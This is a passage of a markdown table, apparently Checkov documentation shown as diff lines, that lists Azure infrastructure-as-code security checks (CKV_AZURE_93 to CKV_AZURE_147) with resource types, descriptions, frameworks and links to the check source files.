disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 1779 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 1780 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | -| 1781 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 1782 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 1783 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1784 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | 
[MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) |
-| 1785 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1786 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1787 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) |
-| 1788 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
-| 1789 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
-| 1790 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) |
-| 1791 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1792 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1793 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1794 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
-| 1795 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) |
-| 1796 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) |
-| 1797 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) |
-| 1798 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) |
-| 1799 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
-| 1800 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
-| 1801 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) |
-| 1802 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
-| 1803 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
-| 1804 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) |
-| 1805 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) |
-| 1806 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
-| 1807 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
-| 1808 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) |
-| 1809 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) |
-| 1810 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) |
-| 1811 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) |
-| 1812 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
-| 1813 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
-| 1814 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) |
-| 1815 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) |
-| 1816 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
-| 1817 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
-| 1818 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) |
-| 1819 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) |
-| 1820 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
-| 1821 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
-| 1822 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) |
-| 1823 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
-| 1824 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
-| 1825 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) |
-| 1826 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
-| 1827 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
-| 1828 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) |
-| 1829 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
-| 1830 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
-| 1831 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) |
-| 1832 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) |
-| 1833 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) |
-| 1834 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) |
-| 1835 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) |
-| 1836 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) |
-| 1837 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) |
-| 1838 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) |
-| 1839 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
-| 1840 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
-| 1841 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) |
-| 1842 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) |
-| 1843 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
-| 1844 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
-| 1845 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) |
-| 1846 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) |
-| 1847 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) |
-| 1848 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) |
-| 1849 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) |
-| 1850 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) |
-| 1851 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) |
-| 1852 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
-| 1853 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
-| 1854 | CKV_AZURE_130 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables infrastructure encryption | Terraform | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py) |
-| 1855 | CKV_AZURE_131 | resource | azurerm_security_center_contact | Ensure that 'Security contact emails' is set | Terraform | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py) |
-| 1856 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) |
-| 1857 | CKV_AZURE_131 | parameter | string | SecureString parameter should not have hardcoded default values | Bicep | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py) |
-| 1858 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
-| 1859 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Bicep | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
-| 1860 | CKV_AZURE_132 | resource | azurerm_cosmosdb_account | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | Terraform | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py) |
-| 1861 | CKV_AZURE_133 | resource | azurerm_frontdoor_firewall_policy | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py) |
-| 1862 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
-| 1863 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | Bicep | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
-| 1864 | CKV_AZURE_134 | resource | azurerm_cognitive_account | Ensure that Cognitive Services accounts disable public network access | Terraform | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py) |
-| 1865 | CKV_AZURE_135 | resource | azurerm_web_application_firewall_policy | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py) |
-| 1866 | CKV_AZURE_136 | resource | azurerm_postgresql_flexible_server | Ensure that PostgreSQL Flexible server enables geo-redundant backups | Terraform | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py) |
-| 1867 | CKV_AZURE_137 | resource | azurerm_container_registry | Ensure ACR admin account is disabled | Terraform | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py) |
-| 1868 | CKV_AZURE_138 | resource | azurerm_container_registry | Ensures that ACR disables anonymous pulling of images | Terraform | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py) |
-| 1869 | CKV_AZURE_139 | resource | azurerm_container_registry | Ensure ACR set to disable public networking | Terraform | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py) |
-| 1870 | CKV_AZURE_140 | resource | azurerm_cosmosdb_account | Ensure that Local Authentication is disabled on CosmosDB | Terraform | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py) |
-| 1871 | CKV_AZURE_141 | resource | azurerm_kubernetes_cluster | Ensure AKS local admin account is disabled | Terraform | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py) |
-| 1872 | CKV_AZURE_142 | resource | azurerm_machine_learning_compute_cluster | Ensure Machine Learning Compute Cluster Local Authentication is disabled | Terraform | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py) |
-| 1873 | CKV_AZURE_143 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster nodes do not have public IP addresses | Terraform | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py) |
-| 1874 | CKV_AZURE_144 | resource | azurerm_machine_learning_workspace | Ensure that Public Access is disabled for Machine Learning Workspace | Terraform | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py) |
-| 1875 | CKV_AZURE_145 | resource | azurerm_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
-| 1876 | CKV_AZURE_145 | resource | azurerm_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
-| 1877 | CKV_AZURE_145 | resource | azurerm_linux_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
-| 1878 | CKV_AZURE_145 | resource | azurerm_linux_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
-| 1879 | CKV_AZURE_145 | resource | azurerm_windows_function_app | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
-| 1880 | CKV_AZURE_145 | resource | azurerm_windows_function_app_slot | Ensure Function app is using the latest version of TLS encryption | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py) |
-| 1881 | CKV_AZURE_146 | resource | azurerm_postgresql_configuration | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py) |
-| 1882 | CKV_AZURE_147 | resource | azurerm_postgresql_server | Ensure PostgreSQL is using the latest version of TLS encryption | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py) |
